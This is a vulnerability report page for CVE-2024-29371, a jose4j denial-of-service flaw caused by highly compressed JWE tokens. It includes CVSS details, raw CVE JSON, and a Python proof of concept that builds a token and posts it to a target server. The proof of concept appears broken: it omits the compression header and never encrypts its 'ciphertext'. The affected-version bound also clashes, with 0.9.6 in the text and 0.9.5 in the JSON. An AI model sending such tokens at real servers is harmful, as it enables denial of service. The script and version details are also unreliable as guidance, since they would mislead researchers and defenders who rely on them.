Security Vulnerability Report

CVE-2024-29371

Published: 2025-12-17 16:16:05
Last Modified: 2026-01-23 20:15:52

Description

In jose4j before 0.9.6, an attacker can cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the server, it results in significant memory allocation and processing time during decompression.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:jose4j_project:jose4j:*:*:*:*:*:*:*:* - VULNERABLE
jose4j < 0.9.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import base64
import zlib
import requests

# Create a high compression ratio payload (Zip Bomb)
# This creates data that expands significantly when decompressed
def create_zip_bomb_payload():
    # Create highly compressible data pattern
    # This pattern compresses extremely well
    payload = (b'A' * 1000) * 100  # 100KB of repeated 'A' characters

    # Compress the payload
    compressed = zlib.compress(payload, level=9)

    # Create JWE token structure
    header = base64.urlsafe_b64encode(b'{"alg":"A128KW","enc":"A128GCM"}')
    encrypted_key = base64.urlsafe_b64encode(b'0' * 16)
    iv = base64.urlsafe_b64encode(b'0' * 12)
    ciphertext = base64.urlsafe_b64encode(compressed)
    auth_tag = base64.urlsafe_b64encode(b'0' * 16)

    # JWE Compact Serialization format
    jwe_token = f"{header.decode()}.{encrypted_key.decode()}.{iv.decode()}.{ciphertext.decode()}.{auth_tag.decode()}"
    return jwe_token

# Example: Generate malicious JWE token
malicious_token = create_zip_bomb_payload()
print(f"Generated malicious JWE token: {malicious_token[:100]}...")
print(f"Token length: {len(malicious_token)} bytes")

# Send to vulnerable jose4j endpoint
target_url = "http://target-server/api/auth/validate"
response = requests.post(target_url, data=malicious_token, headers={"Content-Type": "application/jwt"})
```

References

https://bitbucket.org/b_c/jose4j/issues/220/vuln-zip-bomb-attack (Exploit, Issue Tracking, Mitigation)

Raw JSON Data

```json
{"cve": {"id": "CVE-2024-29371", "sourceIdentifier": "[email protected]", "published": "2025-12-17T16:16:04.567", "lastModified": "2026-01-23T20:15:51.650", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In jose4j before 0.9.6, an attacker can cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the server, it results in significant memory allocation and processing time during decompression."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1259"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jose4j_project:jose4j:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.9.5", "matchCriteriaId": "DE62FF6D-FC62-42B0-9ED4-76A0C4419975"}]}]}], "references": [{"url": "https://bitbucket.org/b_c/jose4j/issues/220/vuln-zip-bomb-attack", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation"]}, {"url": "https://bitbucket.org/b_c/jose4j/issues/220/vuln-zip-bomb-attack", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Mitigation"]}]}}
```